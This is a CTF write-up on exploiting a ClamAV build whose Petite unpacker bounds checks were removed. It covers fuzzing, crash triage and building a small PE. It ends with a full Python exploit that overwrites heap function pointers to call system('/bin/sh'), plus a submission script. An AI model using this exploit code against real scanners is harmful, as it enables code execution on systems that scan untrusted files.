I played Hayyim CTF 2022 with keymoon, st98, and theoremoon. We solved all the pwn tasks and finished in 3rd place. *1
There was a pwn challenge about exploiting antivirus software, which looked interesting, so I started working on it after clearing all the other challenges.
- Fuzz ClamAV to spot the bug
- Make a small Petite PE
- Achieve arb-size heap oob write primitive
- Overwrite a function pointer used by ClamAV
We're given a binary, its libraries, and a patch.
The binary is ClamAV, an open source antivirus software.
The patch introduces a function named gift, which calls the system function with a meaningless command.
The main part of the patch is the following:
diff -ru clamav/libclamav/petite.c clamav-ctf/libclamav/petite.c
--- clamav/libclamav/petite.c 2022-01-11 09:35:04.000000000 +0900
+++ clamav-ctf/libclamav/petite.c 2022-01-25 17:33:58.605682430 +0900
@@ -328,8 +328,8 @@
                  */
                 for (q = 0; q < sectcount; q++) {
-                    if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
-                        continue;
+                    /*if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
+                        continue;*/
                     if (!check4resources) {
                         usects[j].rva = sections[q].rva;
                         usects[j].rsz = thisrva - sections[q].rva + size;
@@ -365,10 +365,10 @@
                  * func to get called instead... ehehe very smart ;)
                  */
-                if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+                /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                     free(usects);
                     return 1;
-                }
+                }*/
                 size--;
                 *ddst++ = *ssrc++; /* eheh u C gurus gotta luv these monsters :P */
@@ -383,10 +383,10 @@
                         return 1;
                     }
                     if (!oob) {
-                        if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+                        /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                             free(usects);
                             return 1;
-                        }
+                        }*/
                         *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
                         size--;
                     } else {
It looks like the patch removes some bounds checks in a file named petite.c.
One more piece of good news is that the target binary clamscan is built without PIE.
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
RUNPATH:  b'/home/auviel/clamav-0.104.2/build/libclamav:/home/auviel/clamav-0.104.2/build/libclammspack:'
FORTIFY:  Enabled
Let's keep in mind that we can call the system function through the PLT.
Since it was late in the CTF when I started on this challenge, I wanted to know whether it was solvable within a few hours before actually writing the exploit. So, I used a fuzzer to check whether the bug could be triggered easily.
Instrumenting PUT
The first thing to do is instrumenting the antivirus.
The original ClamAV doesn't seem to support the CC option in its Makefile, so I set CMAKE_C_COMPILER and CMAKE_CXX_COMPILER when running cmake.
build$ cmake .. -D CMAKE_C_COMPILER=afl-gcc -D CMAKE_CXX_COMPILER=afl-g++
build$ make -j8
It compiled successfully.
Preparing Seed
With great seeds comes great fuzzing.
It's pointless to use a random file as the seed because it is unlikely to reach the patched code.
We need to prepare a file that is likely to trigger the bug.
The patched file is named petite.c, so I googled what "petite" is.
It seems Petite is a packer for 32-bit Windows executables.
Keymoon found that the packer itself was also packed by Petite, so I decided to use petite.exe as the seed file.
Running Fuzzer
I used fuzzuf to fuzz the target because I had already built it in my environment, but AFL should also work, of course.
There was one big problem with fuzzing ClamAV.
clamscan needs to load the antivirus database every time it runs.
This takes about 10 seconds, which makes fuzzing very slow.
I found that I could pass the --database option to specify the path to the database, and it ran relatively fast when I put only bytecode.cvd and freshclam.dat in the database directory.
(Please let me know if you know a better way to fuzz slow-starting executables with AFL.)
Also, don't forget to set a memory limit because ClamAV consumes a lot of memory.
fuzzuf afl -i input -o output --exec_memlimit 128 -- ./clamav/build/clamscan/clamscan --database=./db @@
After running the fuzzer for 3 or 4 minutes, it found some crashes. Yay!
Triaging
We need to check whether the crash is actually exploitable. Some bugs, such as assertion failures or NULL pointer dereferences, do count as crashes but are usually not exploitable.
Let's check the crash files.
$ ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
Loading: 0s, ETA: 0s [========================>] 92/92 sigs
Compiling: 0s, ETA: 0s [========================>] 40/40 tasks
Segmentation fault
The output of dmesg shows that it is not a trivial, definitely-unexploitable bug: the faulting address is far from NULL.
[65033.884299] clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000]
[65033.884308] Code: 4c 24 08 48 89 44 24 10 48 c7 c1 bf 98 00 00 e8 be 7b 00 00 48 8b 44 24 10 48 8b 4c 24 08 48 8b 14 24 48 8d a4 24 98 00 00 00 <41> 0f b6 16 45 8d 4c 24 ff 4c 8d 40 01 49 83 c6 01 41 81 fc ff ff
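To make the dmesg line easier to read, here is a minimal sketch that pulls out its fields. The regular expression and the helper name `parse_segfault` are my own for illustration; the bit meanings are the usual x86 page-fault error code bits (bit 0: page present, bit 1: write, bit 2: user mode).

```python
import re

# The kernel log line from above (timestamp and the "Code:" dump omitted).
LINE = ("clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 "
        "sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000]")

def parse_segfault(line):
    """Hypothetical helper: extract the fields of a Linux segfault log line."""
    m = re.search(r"segfault at ([0-9a-f]+) ip ([0-9a-f]+) sp ([0-9a-f]+) "
                  r"error ([0-9a-f]+) in (\S+)\[([0-9a-f]+)\+([0-9a-f]+)\]", line)
    if m is None:
        raise ValueError("not a segfault line")
    addr, ip, _sp, err, lib, base, _size = m.groups()
    err = int(err, 16)
    return {
        "fault_addr": int(addr, 16),
        "lib": lib,
        # Offset of the faulting instruction inside the mapped library.
        "ip_offset": int(ip, 16) - int(base, 16),
        "page_present": bool(err & 1),
        "is_write": bool(err & 2),
        "user_mode": bool(err & 4),
    }

info = parse_segfault(LINE)
print(info["lib"], hex(info["ip_offset"]))
print("write" if info["is_write"] else "read", "at", hex(info["fault_addr"]))
```

Here the fault is a user-mode read of an unmapped page, from an instruction inside libclamav, which is why it deserves a closer look in the debugger.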
Let's debug it on gdb to confirm the exploitability.
$ gdb --args ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
pwndbg> run
The first thing we notice is that it crashed in the petite_inflate2x_1to9 function, which is exactly the function patched in this challenge.
It means we have at least found a bug in the Petite unpacker.
The second thing to check is the exploitability.
The program died at a movzx instruction as it tried to access an unmapped memory region: 0x5555868bd760.
This code is at L374 in libclamav/petite.c, which is right after the patched code.
size--;
*ddst++ = *ssrc++;
backbytes = 0;
oldback = 0;
It seems we found the intended bug.
Still, we need to check how ddst and ssrc are calculated in the code above to see whether this bug is likely exploitable.
The invalid pointer r14 is calculated by the following code:
r14 is 0x31303330, and this value is taken from a part of the PE.
$ hexdump -C output/crashes/id\:000000* | grep "30 33 30 31"
00006bb0  3c 06 03 55 1d 1f 04 35  30 33 30 31 a0 2f a0 2d  |<..U...50301./.-|
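The same search can be sketched in Python, which also makes the byte order explicit. The helper name `find_dword` is hypothetical, and the demo runs on the 16 bytes of the hexdump row above rather than on the real crash file.

```python
import struct

def find_dword(data, value):
    """Return every offset where `value` appears as a little-endian 32-bit integer."""
    needle = struct.pack("<I", value)
    hits = []
    pos = data.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = data.find(needle, pos + 1)
    return hits

# 0x31303330 is stored little-endian, i.e. as the bytes 30 33 30 31 ("0301").
needle_bytes = struct.pack("<I", 0x31303330)

# The 16 bytes of the hexdump row at file offset 0x6bb0.
row = bytes.fromhex("3c0603551d1f043530333031a02fa02d")
offsets = [0x6bb0 + off for off in find_dword(row, 0x31303330)]
print(needle_bytes, [hex(o) for o in offsets])
```

Unlike grep on hexdump output, this also finds matches that straddle a 16-byte row boundary.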
The offset used to calculate ddst is also taken from the PE, meaning we have the following primitive.
some_heap_ptr[dst_offset] = some_heap_ptr[src_offset]
From this we can conclude that the bug is likely exploitable. (To be more precise, we also need to check how many times the bug can be triggered. I'll come back to this later.)
Reading the challenge code, it turned out that I could not simply use the crash file to write the exploit because of the following check in wrapper.py:
if file_size > 10000 or file_size <= 0:
    print("invalid input\n")
    exit()
We need to make the exploit very small.
Small PE
Fortunately I had written a template script to generate a small PE when I solved a challenge from Pwn2Win CTF 2021 and I used the script.
To reach the Petite parser, however, it was necessary to fix some broken values in the PE because ClamAV doesn't try to inflate a broken PE.
The --debug option prints detailed messages about errors encountered while parsing the PE.
I combined it with the traditional print-debug to fix my PE.
Here is the code to generate a valid small PE with 2 sections.
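from ptrlib import *

num_sections = 2

pe = b''
# DOS header: only the magic and e_lfanew (at offset 0x3c) matter
pe += b'MZ\0\0'
pe += b'\0' * 0x38
pe += p32(0x40)

# PE signature and COFF file header
pe += b'PE\0\0'
pe += p16(0)             # Machine
pe += p16(num_sections)  # NumberOfSections
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += p16(0xe0)          # SizeOfOptionalHeader
pe += p16(2)             # Characteristics

# Optional header (PE32)
pe += p16(0x010b)        # Magic
pe += p16(0)
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += p32(0x5100)        # AddressOfEntryPoint
pe += p32(0)
pe += p32(0)
pe += p32(0xcafe0000)    # ImageBase
pe += p32(0x1000)        # SectionAlignment
pe += p32(0x200)         # FileAlignment
pe += p16(0) * 6
pe += p32(0)
pe += p32(0x1000)        # SizeOfImage
pe += p32(0)
pe += p32(0)
pe += p16(3)             # Subsystem
pe += p16(0)
pe += p32(1)
pe += p32(2)
pe += p32(3)
pe += p32(4)
pe += p32(0)
pe += p32(0x10)          # NumberOfRvaAndSizes

# Data directories (16 entries of 8 bytes each)
pe += p32(0x400)
pe += p32(0x100)
pe += p32(0)
pe += p32(0)
pe += p32(0) * 28

# Section header 1
pe += b'.AAAA\0\0\0'
pe += p32(0x1000)        # VirtualSize
pe += p32(0x4000)        # VirtualAddress (RVA)
pe += p32(0x10)          # SizeOfRawData
pe += p32(0x400)         # PointerToRawData
pe += p32(0)
pe += p32(0)
pe += p16(0) * 2
pe += p32(0)

# Section header 2
pe += b'.BBBB\0\0\0'
pe += p32(0x1000)        # VirtualSize
pe += p32(0x5000)        # VirtualAddress (RVA)
pe += p32(0x20)          # SizeOfRawData
pe += p32(0x500)         # PointerToRawData
pe += p32(0)
pe += p32(0)
pe += p16(0) * 2
pe += p32(0)

# Padding and section contents
pe += b'\x00' * (0x400 - len(pe))
pe += b'A' * (0x500 - len(pe))
pe += b'A' * (0x600 - len(pe))

with open("sample.exe", "wb") as f:
    f.write(pe)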
The next thing to do is to make ClamAV recognize our PE as Petite-packed. Keymoon helped me figure out how ClamAV determines the packer.
ClamAV checks the packer in cli_scanpe, and the code that checks for the Petite packer starts around L4000.
The code is small. It seems to check for a mov instruction and its immediate operand at the entry point, which the packer probably uses to jump to a specific position in the unpacker.
if (epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 1].rva + EC32(peinfo->pe_opt.opt32.ImageBase)) {
    if (peinfo->nsections < 2 || epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 2].rva + EC32(peinfo->pe_opt.opt32.ImageBase))
        found = 0;
    else
        found = 1;
}
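As a rough Python model of this check (not ClamAV's code), the sketch below returns which section the `mov eax, imm32` at the entry point refers to. The function name `petite_version` is hypothetical, and the initial value 2 for `found` is an assumption, since the snippet above only shows the 0 and 1 cases.

```python
import struct

def petite_version(epbuff, section_rvas, image_base):
    """Model of the entry-point check: 2 or 1 if it looks like Petite, else 0."""
    found = 2  # assumption: value kept when the last section matches
    # Extra length guard for this sketch only: opcode byte plus 4-byte immediate.
    if len(epbuff) < 5 or epbuff[0] != 0xb8:  # 0xb8 = mov eax, imm32
        return 0
    imm = struct.unpack_from("<I", epbuff, 1)[0]
    last = (section_rvas[-1] + image_base) & 0xffffffff
    if imm != last:
        if len(section_rvas) < 2:
            return 0
        second_last = (section_rvas[-2] + image_base) & 0xffffffff
        found = 1 if imm == second_last else 0
    return found

# Values from the PE in this write-up: ImageBase 0xcafe0000, sections at 0x4000 and 0x5000.
entry = b"\xb8" + struct.pack("<I", 0xcafe5000)
print(petite_version(entry, [0x4000, 0x5000], 0xcafe0000))
```

So for our two-section PE, placing `b8 00 50 fe ca` at the entry point is enough to pass this particular check.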
There are also other checks but they're just some sanity checks and we can pass them without any modifications.
Finally, petite_inflate2x_1to9 is called.
However, there is one more check to pass.
There is a variable named srva, and we need to make it a non-zero, positive value.
if (version == 2)
    packed = adjbuf + sections[sectcount - 1].rva + 0x1b8;
...
srva = cli_readint32(packed);
...
size = srva & 0x7fffffff;
if (srva != size) {
...
As you can see from the code above, this 32-bit value is taken from offset 0x1b8 of the last section of PE.
This is the very value that caused the crash.
After srva there must be two more values: size and thisrva.
size = cli_readint32(packed + 4);
thisrva = cli_readint32(packed + 8);
Now we can write the vulnerability as
adjbuf[thisrva] = adjbuf[srva]
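To make the layout concrete, here is a small sketch that splits the 12 bytes at `packed` into the three fields. The helper name `read_record` is hypothetical, and the validity condition only mirrors what the text above says about srva (non-zero, top bit clear); the real function has more checks that are elided here.

```python
import struct

def read_record(packed):
    """Hypothetical helper: parse (srva, size, thisrva) from the bytes at `packed`."""
    srva, size, thisrva = struct.unpack_from("<III", packed, 0)
    # Per the text, srva must be non-zero and "positive" (bit 31 clear),
    # otherwise `srva != (srva & 0x7fffffff)` and a different path is taken.
    if srva == 0 or srva != (srva & 0x7fffffff):
        raise ValueError("srva does not select the copy path")
    return srva, size, thisrva

# The three values placed at offset 0x1b8 of the last section in the final exploit.
record = struct.pack("<III", 0x5300, 0x40, 0x90)
srva, size, thisrva = read_record(record)
print(hex(srva), hex(size), hex(thisrva))
```

With these values the copy reads from adjbuf[0x5300] and writes 0x40 bytes starting at adjbuf[0x90].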
The pointer adjbuf is defined at the beginning of the function:
char *adjbuf = buf - minrva;
This code looks weird because it's subtracting a value from a base pointer.
buf is a buffer holding the contents of the PE sections.
minrva is the smallest RVA among all the sections.
As shown in the figure above, the pointer adjbuf is itself invalid.
It is used with an RVA as the index so that the code can access the sections directly without converting the RVA.
What scary code.
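The pointer arithmetic can be modelled with plain integers. This is only a sketch: `MINRVA` matches the sections of the PE in this write-up, but `BUFSZ` is a hypothetical size chosen for illustration, since the real value depends on how ClamAV sizes the buffer.

```python
def buf_offset(rva, minrva):
    """Offset from the start of `buf` that adjbuf[rva] actually touches."""
    return rva - minrva

def inside_buf(rva, minrva, bufsz):
    """True if adjbuf[rva] lands inside [buf, buf + bufsz)."""
    return 0 <= buf_offset(rva, minrva) < bufsz

MINRVA = 0x4000  # smallest section RVA in the PE used in this write-up
BUFSZ = 0x2000   # hypothetical buffer size, for illustration only

for name, rva in (("srva", 0x5300), ("thisrva", 0x90)):
    where = "inside buf" if inside_buf(rva, MINRVA, BUFSZ) else "OUT OF BOUNDS"
    print(name, hex(rva), "-> buf offset", hex(buf_offset(rva, MINRVA)), where)
```

Any RVA smaller than minrva gives a negative offset, that is, an address on the heap before buf; with the bounds checks commented out, nothing stops the copy from going there.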
Time to write exploit :)
Making Primitive
So, adjbuf points to an invalid heap region before the actual sections.
This means we can write out-of-bounds not only in the positive direction but also at a (small) negative offset from buf.
Anyway, there is still one important thing we need to test: How many bytes can we overwrite?
This is a part of the code around the vulnerability:
...
size--;
*ddst++ = *ssrc++;
backbytes = 0;
oldback = 0;
while (size > 0) {
    oob = doubledl(&ssrc, &mydl, buf, bufsz);
    if (oob == -1) {
        free(usects);
        return 1;
    }
    if (!oob) {
        *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
        size--;
    } else {
...
As I explained, we have already confirmed that the first *ddst++ = *ssrc++; can read and write out-of-bounds.
However, this is just a 1-byte write and we need more.
After the first write, there is a while-loop that appears to iterate size times.
We want to reach the following line inside the while-loop to achieve an OOB write of arbitrary size.
*ddst++ = (char)((*ssrc++) ^ (size & 0xff));
For this we have to pass the check:
oob = doubledl(&ssrc, &mydl, buf, bufsz);
if (oob == -1) {
    free(usects);
    return 1;
}
if (!oob) {
...
The question is: what is doubledl?
This function is defined at the beginning of petite.c as shown below:
static int doubledl(char **scur, uint8_t *mydlptr, char *buffer, uint32_t buffersize)
{
    unsigned char mydl = *mydlptr;
    unsigned char olddl = mydl;

    mydl *= 2;
    if (!(olddl & 0x7f)) {
        if (*scur < buffer || *scur >= buffer + buffersize - 1)
            return -1;
        olddl = **scur;
        mydl = olddl * 2 + 1;
        *scur = *scur + 1;
    }
    *mydlptr = mydl;
    return (olddl >> 7) & 1;
}
I don't fully understand what this function is for, but two things are clear.
- It should not return -1
- We want it to return 0, because the write we are after sits in the if (!oob) branch
The code below checks if ssrc is within the section being parsed.
if (*scur < buffer || *scur >= buffer + buffersize - 1) return -1;
It means ssrc has to stay in bounds whenever this check runs, so we cannot read data out-of-bounds. This is not a big problem because we still have the OOB write.
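Porting the function to Python makes its behaviour easier to see. This is a sketch, not ClamAV's code: `stream` stands for the bytes in [buffer, buffer + buffersize), `pos` for `*scur - buffer`, and the helper `read_bits` and the starting state 0x80 are assumptions (any starting value whose low 7 bits are zero forces a fetch on the first call).

```python
def doubledl(stream, pos, mydl):
    """Python port of doubledl(). Returns (bit, new_pos, new_mydl); bit is -1 on error."""
    olddl = mydl
    mydl = (mydl * 2) & 0xff
    if not (olddl & 0x7f):
        # All buffered bits are used up: fetch the next control byte.
        if pos < 0 or pos >= len(stream) - 1:
            return -1, pos, olddl  # state is left untouched, as in the C code
        olddl = stream[pos]
        mydl = (olddl * 2 + 1) & 0xff  # shift left and append a sentinel 1 bit
        pos += 1
    return (olddl >> 7) & 1, pos, mydl

def read_bits(stream, count, mydl=0x80):
    """Hypothetical driver: call doubledl `count` times and collect the bits."""
    pos, bits = 0, []
    for _ in range(count):
        bit, pos, mydl = doubledl(stream, pos, mydl)
        bits.append(bit)
    return bits, pos

print(read_bits(bytes([0xa5, 0x00, 0x00]), 8))
print(read_bits(bytes([0x00, 0x00, 0x00]), 8))
```

In this model doubledl is a bit reader: it fetches one control byte, hands out its 8 bits from the most significant one, then fetches the next byte. A control byte of 0x00 therefore yields eight 0 bits in a row, which is eight passes through the `if (!oob)` branch.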
Dynamically debugging the function, I confirmed that oob can be kept at 0.
So, we can reach the following code:
*ddst++ = (char)((*ssrc++) ^ (size & 0xff)); size--;
Since the packer uses a sort of obfuscation, I wrote an encoder for it.
def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output
Now we can write as much data as we want, as long as the file size limit allows.
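As a sanity check, the encoder can be run against a simplified model of the copy loop. The `decode` function below is my own sketch of the literal-only path (first raw byte, then XORed literals gated by 0 bits); the back-reference branch is not modelled, the initial `mydl` of 0x80 is an assumption, and the address 0x401234 is a placeholder.

```python
import struct

def encode(data, size):
    """The encoder from this write-up, unchanged in behaviour."""
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([c])                  # first byte is copied raw
        else:
            output += bytes([c ^ (size & 0xff)])  # literals are XORed with size
        if i % 8 == 0:
            output += bytes([0])                  # control byte: eight 0 bits
        i += 1
        size -= 1
    return output

def decode(stream, size):
    """Simplified model of the unpack loop, literal path only."""
    out = bytearray()
    pos, mydl = 0, 0x80  # assumed initial bit-reader state
    size -= 1
    out.append(stream[pos]); pos += 1
    while size > 0:
        olddl, mydl = mydl, (mydl * 2) & 0xff
        if not (olddl & 0x7f):                    # fetch a new control byte
            olddl = stream[pos]
            mydl = (olddl * 2 + 1) & 0xff
            pos += 1
        if (olddl >> 7) & 1:
            raise ValueError("back-reference path is not modelled")
        out.append(stream[pos] ^ (size & 0xff)); pos += 1
        size -= 1
    return bytes(out)

payload = (b"/bin/sh\0" + struct.pack("<Q", 0x401234)) * 4  # placeholder address
stream = encode(payload, len(payload))
print(len(stream), decode(stream, len(payload)) == payload)
```

The round trip succeeding suggests the control bytes are inserted at the positions where the bit reader fetches them, at least for this model.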
Where to Write
The last thing we need to do is to find a good target to overwrite.
First, the following data attracted my attention:
pwndbg> x/32xg 0x10647f0 - 0x1010 - 0x100
0x10636e0: 0x0000400000000000 0x0000040000001000
0x10636f0: 0x0000500000000100 0x0000060000001000
0x1063700: 0x0000000000000400 0x0000100000005000
0x1063710: 0x0000040000000600 0x0000000000000061
0x1063720: 0x000000000067ed80 0x000000000067e8a0
0x1063730: 0x0000000000000000 0x0000000000000000
0x1063740: 0x0000000000000000 0x0000000000000000
0x1063750: 0x0000000000000000 0x0000000000000000
0x1063760: 0x0000000000000000 0x0000000000000000
0x1063770: 0x0000000000000060 0x0000000000000070
0x1063780: 0x00000000004cb250 0x0000000000424010
0x1063790: 0x0000000000000000 0x0000000000000000
0x10637a0: 0x0000000000000000 0x0000000000000000
0x10637b0: 0x0000000000000000 0x0000000000000000
0x10637c0: 0x0000000000000000 0x0000000000000000
0x10637d0: 0x0000000000000000 0x0000000000000000
The chunk at 0x1063780 is obviously linked into tcache.
I thought of overwriting the link with a GOT address and then overwriting a GOT entry. *2
However, when I checked it on my host machine and in docker, the heap layout changed drastically. It also changes as the virus database changes. So, the exploit would be very unstable even if it were possible.
After checking the heap some more, I found the following data when I gave 2 identical PE files to ClamAV:
pwndbg> x/32xg 0x1063630 - 0x4000
0x105f630: 0x00000000000003fe 0x0000000000000000
0x105f640: 0x0000000000000000 0x07560707005d0000
0x105f650: 0x0000000000480079 0x0000000000000071
0x105f660: 0x00007ffff7dee8f0 0x00007ffff7dee900
0x105f670: 0x0000000000000000 0x0000000000000000
0x105f680: 0x0000000000000000 0x0000000000000000
0x105f690: 0x0000000000000000 0x0000000000000000
0x105f6a0: 0x0000000000000000 0xffffffffffffffff
0x105f6b0: 0x000186a001312d00 0x00000000000007d0
0x105f6c0: 0x0000000001084730 0x0000000000000131
0x105f6d0: 0x00007ffff7dee8f0 0x00007ffff7dee900
0x105f6e0: 0x0000000000000000 0x00007ffff76fbbc0
0x105f6f0: 0x0000000000000000 0x0000000000000000
0x105f700: 0x0000000000000000 0x0000000000000000
0x105f710: 0x0000000000000000 0x0000000000000122
0x105f720: 0x0000042850435245 0x0000000000000428
Pointers such as 0x00007ffff7dee8f0 and 0x00007ffff7dee900 point into a machine code region.
It means they are function pointers.
I don't know which functions they are or who calls them and when, but as you can see the chunks are not freed, which means the pointers are likely to be called.
I wrote an exploit to overwrite them with 0xffffffffdeadbeef and 0xffffffffcafebabe and ran it.
*RAX 0x0
*RBX 0x7fffab372bf8 ◂— 0x0
*RCX 0x7
*RDX 0x7ffff7d5cbe0 —▸ 0x10e9010 ◂— 0x20 /* ' ' */
*RDI 0x105f660 ◂— 0xffffffffdeadbeef
*RSI 0x0
*R8 0x7
*R9 0x7fffffffc3e0 ◂— 0x0
*R10 0xfffffffffffff103
*R11 0x7ffff76865e0 ◂— endbr64
*R12 0x7fffab372bd8 ◂— 0x0
*R13 0x73
*R14 0x194
*R15 0x72
*RBP 0xa
*RSP 0x7fffffffc8c8 —▸ 0x7ffff7def2ea ◂— mov qword ptr [rbx + 8], 0
*RIP 0xffffffffcafebabe
Yay!
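As you can see, the second function pointer is called with a pointer to the struct as the first argument.
Therefore, by writing "/bin/sh\0" over the first pointer and the PLT address of system over the second one, we can call system("/bin/sh\0");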
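The resulting payload layout can be sketched as follows. `SYSTEM_PLT` is a placeholder value (the real address comes from the clamscan ELF), and the helper name `spray` is hypothetical; repeating the 16-byte pair is meant to tolerate some uncertainty about where exactly the pointer pair sits.

```python
import struct

SYSTEM_PLT = 0x401234  # placeholder; the real address is read from the clamscan ELF

def spray(total_size, system_addr):
    """Repeat the 16-byte pair [b"/bin/sh\\0", system_addr] to fill total_size bytes."""
    pair = b"/bin/sh\0" + struct.pack("<Q", system_addr)
    if total_size % len(pair) != 0:
        raise ValueError("total_size must be a multiple of 16")
    return pair * (total_size // len(pair))

payload = spray(0x40, SYSTEM_PLT)

# Offset +0 is where RDI points (the command string),
# offset +8 is the slot of the function pointer that gets called.
command = payload[0:8]
target = struct.unpack_from("<Q", payload, 8)[0]
print(command, hex(target))
```

This only works if the write starts on a 16-byte boundary relative to the pointer pair, which is why the destination offset still has to be tuned.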
Final Exploit
The offset to the function pointer still differs depending on the environment, the database, and so on. However, it seems to be somewhere around there at least.
I changed the offset by 0x10 bytes on each try, and my exploit worked with 0x90 on remote.
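from ptrlib import *

elf = ELF("share/clamscan")

num_sections = 2

pe = b''
# DOS header: only the magic and e_lfanew (at offset 0x3c) matter
pe += b'MZ\0\0'
pe += b'\0' * 0x38
pe += p32(0x40)

# PE signature and COFF file header
pe += b'PE\0\0'
pe += p16(0)             # Machine
pe += p16(num_sections)  # NumberOfSections
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += p16(0xe0)          # SizeOfOptionalHeader
pe += p16(2)             # Characteristics

# Optional header (PE32)
pe += p16(0x010b)        # Magic
pe += p16(0)
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += p32(0x5000)        # AddressOfEntryPoint: start of the last section
pe += p32(0)
pe += p32(0)
pe += p32(0xcafe0000)    # ImageBase
pe += p32(0x1000)        # SectionAlignment
pe += p32(0x200)         # FileAlignment
pe += p16(0) * 6
pe += p32(0)
pe += p32(0x1000)        # SizeOfImage
pe += p32(0)
pe += p32(0)
pe += p16(3)             # Subsystem
pe += p16(0)
pe += p32(1)
pe += p32(2)
pe += p32(3)
pe += p32(4)
pe += p32(0)
pe += p32(0x10)          # NumberOfRvaAndSizes

# Data directories (16 entries of 8 bytes each)
pe += p32(0x400)
pe += p32(0x100)
pe += p32(0)
pe += p32(0)
pe += p32(0) * 28

# Section header 1
pe += b'.AAAA\0\0\0'
pe += p32(0x1000)        # VirtualSize
pe += p32(0x4000)        # VirtualAddress (RVA)
pe += p32(0x100)         # SizeOfRawData
pe += p32(0x400)         # PointerToRawData
pe += p32(0)
pe += p32(0)
pe += p16(0) * 2
pe += p32(0)

# Section header 2
pe += b'.BBBB\0\0\0'
pe += p32(0x1000)        # VirtualSize
pe += p32(0x5000)        # VirtualAddress (RVA)
pe += p32(0x5000)        # SizeOfRawData
pe += p32(0x600)         # PointerToRawData
pe += p32(0)
pe += p32(0)
pe += p16(0) * 2
pe += p32(0)

pe += b'\x00' * (0x400 - len(pe))
pe += b'C' * (0x600 - len(pe))

# Entry point: mov eax, ImageBase + RVA of the last section (Petite detection)
pe += b'\xb8'
pe += p32(0xcafe5000)
pe += b'A' * (0x1b8 - 5)

# Values read at offset 0x1b8 of the last section
size = 0x40
pe += p32(0x5300)        # srva: RVA of the encoded payload (file offset 0x900)
pe += p32(size)          # size
pe += p32(0x90)          # thisrva: destination, tuned in steps of 0x10
pe += p32(0xdeadbeef)
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += b'B' * (0x900 - len(pe))

def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output

# "/bin/sh\0" lands on the first function pointer, system@plt on the second
data = b'/bin/sh\0'
data += p64(elf.plt("system"))
data *= (size // 0x10)
pe += encode(data, size)
pe += b'B' * (0x2000 - len(pe))

print(len(pe))
with open("sample.exe", "wb") as f:
    f.write(pe)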
from ptrlib import *

fs = [
    "sample.exe",
    "sample.exe",
]

sock = Socket("nc 141.164.48.191 10000")
sock.sendlineafter(": ", str(len(fs)))
for f in fs:
    buf = open(f, "rb").read()
    assert len(buf) < 10000
    sock.sendlineafter(": ", str(len(buf)))
    sock.sendafter(": ", buf)

sock.interactive()
This challenge ended with 1 solve.